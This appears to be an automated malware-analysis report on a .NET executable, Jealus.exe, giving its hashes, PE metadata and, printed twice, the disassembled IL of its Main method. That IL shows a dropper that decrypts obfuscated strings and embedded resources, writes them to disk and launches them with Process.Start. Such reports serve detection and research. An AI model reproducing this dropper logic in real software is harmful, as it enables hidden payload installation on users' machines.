Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 4e4f12fc574559e8bf84bfe074f4cad5
|
| Sha1 | dade266ab97707f55ce2b091bdcb14474691c5f9
|
| Sha256 | 27a2505cfd32ca1fda31e58c1d2ddee7e4726b8305fda10b779851e259a2ef9d
|
| Sha384 | 58ff200dec72ff51a5515f06dcf6c681abbfe46a5dcecbee3b4609463e068db24e22d5dbd26e325856e37257644d49d4
|
| Sha512 | 097d6eae8b514d5789b47b5fb57378a1bc6c5f3653d85791c14264b8c638b2a5d6aca26c0be4c3d76dae2faa351a879baacdaa58c8ec2456098ddc823ce1a7aa
|
| SSDeep | 24576:eMSSuyVF2DHjSk3g9CSUqC/7fPFuE0IwgL9/t:D972nw9MDfPkKL9/t
|
| TLSH | 4F15237A5EC166A0D0A1AEB524E2E195AE7487B330FD2DDF65A20B2CC511F50FD03FA0
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | Jealus.exe |
| Full Name | Jealus.exe |
| EntryPoint | System.Void vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::Main() |
| Scope Name | Jealus.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Jealus |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 17 |
| Main Method | System.Void vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::Main() |
| Main IL Instruction Count | 121 |
| Main IL | ldstr ND6WZ+menzBQtEv8VZ29LWC+7AorN8tXtpZib9AMLnklhFaAqBkI8Oy0t5Mk5vaVxYsdU+cIjGPg26kVpf3utjJZVsxoVB9QZV/qhY6MTSLPZgv5PCxXJGic//bCde7ZuE7UaFF6mO91cCt3VbQ1r5z9h535AXeHDtunT4wWnvS4rWwUEbWGxuHDv6Fz1gtXhGBSQhjHAlJ04zqjFAOD7AMBbK4TlYInYzmEjwWtUqExqYr1gz6F+Brid3d6+1zEm3y8MHd+fWzmL1GIz66p1uxsvDZlgEBwjfAvJUfA0qE0EOZZauSQbXLA0juJR3T0zynarN+/iR2JEsoZjb7LUxrN9xHirrfPclt7wt0//I0W+2Xxtye77tDhhNwVL16JesEdB/TQPmVNHkyHXbyTxKECqfUUuCKKPBncCb0CvC8UFXPd7pIc27pP737yRoBbByTsHS6ZFgz65ebJRAXTfHl2vSIZVEximqYFE2QsALDiW2+kktJqNsKt/L9+DYnR4Xtbd3yDX+418BFw4XRKaQ== call System.String vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::euhyiruadyugmplwgxqa(System.String) call System.Void vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::xmcvr(System.String) ldstr ND6WZ+menzBQtEv8VZ29LT+4j277/Y4cG3xNyhqCcdWHxOAKOXWrXQZjDdG68aS+yanw/HdEg9WeowNQZJY0gPqPPUT7zSczA36Q6YySrTZ8whHObpujlgvW2brKNjgIeMe3Ov1WdhaRnm73DgIR91h1E3bx/YK0qyGchD5OY/zTehDymPtVVI/3+w7roKlLFalbf396G/Sfh+63SDBPrbeM7SGJpTL5shD1fNuoZHdD+T5l09xKBLfqn80LceY73n+ldy91w3glUKaUGUCuJEaiw8iDQSE7dEZ0N9bDIli6UFoQ5s7rPFJZ7ZMSl+tg5wMarEpoKedV/N1xH17UDhrq+ssQ8ekYf8UHMjf/Lx7+s8SpNrStclH/n/sZ5zo3KL4RJ9yqwkW09p0azsbPbg== call System.String vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::euhyiruadyugmplwgxqa(System.String) call System.Void vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::xmcvr(System.String) ldc.i4.2 <null> newarr System.String[] stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> ldc.i4.4 <null> newarr System.String stloc.s V_5 ldloc.s V_5 ldc.i4.0 <null> ldstr cXH4iZTK6WQg/FffdBuNyQ== stelem.ref <null> ldloc.s V_5 ldc.i4.1 <null> ldstr ZrwX5HdHueXTItWtRrhd2c8y62hC5xXWmSU2ff96Z6Y= stelem.ref <null> ldloc.s V_5 ldc.i4.2 <null> ldstr gdrianuereayfjqq stelem.ref <null> ldloc.s V_5 ldc.i4.3 <null> ldstr XYIWbEKBnediinnklTcmhw== stelem.ref <null> ldloc.s V_5 stelem.ref <null> ldloc.s V_4 ldc.i4.1 <null> ldc.i4.4 <null> newarr System.String stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ldstr cXH4iZTK6WQg/FffdBuNyQ== stelem.ref <null> ldloc.s V_6 ldc.i4.1 <null> ldstr Rv6k7jJokoj9yTd9bokQvA4GuKnt3W9Q3sKitd9YtS4= stelem.ref <null> ldloc.s V_6 ldc.i4.2 <null> ldstr zvlesebzqqkldfxv stelem.ref <null> ldloc.s V_6 ldc.i4.3 <null> ldstr XYIWbEKBnediinnklTcmhw== stelem.ref <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_4 stloc.0 <null> ldstr hfxrbyaeumiwhqze call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_0119: ldloc.2 ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> ldstr ETjIzoaMxxYc9XHDy030By8VNyh8qYhDSwoCmP4hYbo= call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_00C3: call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> call System.String vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::euhyiruadyugmplwgxqa(System.String) call System.String System.Environment::GetEnvironmentVariable(System.String) br.s IL_00C8: ldloc.0 call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.1 <null> ldelem.ref <null> call System.String vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::euhyiruadyugmplwgxqa(System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldloc.1 <null> ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.2 <null> ldelem.ref <null> callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Byte[] vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::ytxdtmsv(System.Byte[]) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.3 <null> ldelem.ref <null> call System.String vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::euhyiruadyugmplwgxqa(System.String) ldstr XYIWbEKBnediinnklTcmhw== call System.String vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::euhyiruadyugmplwgxqa(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0115: ldloc.2 ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4.2 <null> blt.s IL_00A1: ldloc.0 ret <null> |
| Module Name | Jealus.exe |
| Full Name | Jealus.exe |
| EntryPoint | System.Void vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::Main() |
| Scope Name | Jealus.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Jealus |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 17 |
| Main Method | System.Void vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::Main() |
| Main IL Instruction Count | 121 |
| Main IL | ldstr ND6WZ+menzBQtEv8VZ29LWC+7AorN8tXtpZib9AMLnklhFaAqBkI8Oy0t5Mk5vaVxYsdU+cIjGPg26kVpf3utjJZVsxoVB9QZV/qhY6MTSLPZgv5PCxXJGic//bCde7ZuE7UaFF6mO91cCt3VbQ1r5z9h535AXeHDtunT4wWnvS4rWwUEbWGxuHDv6Fz1gtXhGBSQhjHAlJ04zqjFAOD7AMBbK4TlYInYzmEjwWtUqExqYr1gz6F+Brid3d6+1zEm3y8MHd+fWzmL1GIz66p1uxsvDZlgEBwjfAvJUfA0qE0EOZZauSQbXLA0juJR3T0zynarN+/iR2JEsoZjb7LUxrN9xHirrfPclt7wt0//I0W+2Xxtye77tDhhNwVL16JesEdB/TQPmVNHkyHXbyTxKECqfUUuCKKPBncCb0CvC8UFXPd7pIc27pP737yRoBbByTsHS6ZFgz65ebJRAXTfHl2vSIZVEximqYFE2QsALDiW2+kktJqNsKt/L9+DYnR4Xtbd3yDX+418BFw4XRKaQ== call System.String vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::euhyiruadyugmplwgxqa(System.String) call System.Void vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::xmcvr(System.String) ldstr ND6WZ+menzBQtEv8VZ29LT+4j277/Y4cG3xNyhqCcdWHxOAKOXWrXQZjDdG68aS+yanw/HdEg9WeowNQZJY0gPqPPUT7zSczA36Q6YySrTZ8whHObpujlgvW2brKNjgIeMe3Ov1WdhaRnm73DgIR91h1E3bx/YK0qyGchD5OY/zTehDymPtVVI/3+w7roKlLFalbf396G/Sfh+63SDBPrbeM7SGJpTL5shD1fNuoZHdD+T5l09xKBLfqn80LceY73n+ldy91w3glUKaUGUCuJEaiw8iDQSE7dEZ0N9bDIli6UFoQ5s7rPFJZ7ZMSl+tg5wMarEpoKedV/N1xH17UDhrq+ssQ8ekYf8UHMjf/Lx7+s8SpNrStclH/n/sZ5zo3KL4RJ9yqwkW09p0azsbPbg== call System.String vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::euhyiruadyugmplwgxqa(System.String) call System.Void vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::xmcvr(System.String) ldc.i4.2 <null> newarr System.String[] stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> ldc.i4.4 <null> newarr System.String stloc.s V_5 ldloc.s V_5 ldc.i4.0 <null> ldstr cXH4iZTK6WQg/FffdBuNyQ== stelem.ref <null> ldloc.s V_5 ldc.i4.1 <null> ldstr ZrwX5HdHueXTItWtRrhd2c8y62hC5xXWmSU2ff96Z6Y= stelem.ref <null> ldloc.s V_5 ldc.i4.2 <null> ldstr gdrianuereayfjqq stelem.ref <null> ldloc.s V_5 ldc.i4.3 <null> ldstr XYIWbEKBnediinnklTcmhw== stelem.ref <null> ldloc.s V_5 stelem.ref <null> ldloc.s V_4 ldc.i4.1 <null> ldc.i4.4 <null> newarr System.String stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ldstr cXH4iZTK6WQg/FffdBuNyQ== stelem.ref <null> ldloc.s V_6 ldc.i4.1 <null> ldstr Rv6k7jJokoj9yTd9bokQvA4GuKnt3W9Q3sKitd9YtS4= stelem.ref <null> ldloc.s V_6 ldc.i4.2 <null> ldstr zvlesebzqqkldfxv stelem.ref <null> ldloc.s V_6 ldc.i4.3 <null> ldstr XYIWbEKBnediinnklTcmhw== stelem.ref <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_4 stloc.0 <null> ldstr hfxrbyaeumiwhqze call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_0119: ldloc.2 ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> ldstr ETjIzoaMxxYc9XHDy030By8VNyh8qYhDSwoCmP4hYbo= call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_00C3: call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> call System.String vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::euhyiruadyugmplwgxqa(System.String) call System.String System.Environment::GetEnvironmentVariable(System.String) br.s IL_00C8: ldloc.0 call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.1 <null> ldelem.ref <null> call System.String vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::euhyiruadyugmplwgxqa(System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldloc.1 <null> ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.2 <null> ldelem.ref <null> callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Byte[] vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::ytxdtmsv(System.Byte[]) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.3 <null> ldelem.ref <null> call System.String vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::euhyiruadyugmplwgxqa(System.String) ldstr XYIWbEKBnediinnklTcmhw== call System.String vpppapxqlhunnbxavuims.vpppapxqlhunnbxavuims::euhyiruadyugmplwgxqa(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0115: ldloc.2 ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4.2 <null> blt.s IL_00A1: ldloc.0 ret <null> |